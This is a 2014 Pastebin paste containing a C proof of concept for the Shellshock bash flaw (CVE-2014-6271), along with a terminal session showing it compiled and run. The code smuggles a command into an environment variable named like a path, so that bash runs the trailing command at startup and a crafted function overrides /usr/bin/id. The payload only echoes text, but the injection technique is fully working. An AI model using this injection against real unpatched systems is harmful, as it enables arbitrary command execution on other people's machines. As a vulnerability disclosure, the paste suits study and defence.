daily pastebin goal
38%
SHARE
TWEET

bash-is-fun

a guest Sep 24th, 2014 1,660 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. je@tiny:~$ cat > bash-is-fun.c
  2. /* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
  3. #include <unistd.h>
  4. #include <stdio.h>
  5.  
  6. int main()
  7. {
  8.     char *envp[] = {
  9.         "PATH=/bin:/usr/bin",
  10.         "/usr/bin/id=() { "
  11.         "echo pwn me twice, shame on me; }; "
  12.         "echo pwn me once, shame on you",
  13.         NULL
  14.     };
  15.     char *argv[] = { "/bin/bash", NULL };
  16.  
  17.     execve(argv[0], argv, envp);
  18.     perror("execve");
  19.     return 1;
  20. }
  21. ^D
  22. je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
  23. je@tiny:~$ ./bash-is-fun
  24. pwn me once, shame on you
  25. je@tiny:/home/je$ /usr/bin/id
  26. pwn me twice, shame on me
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top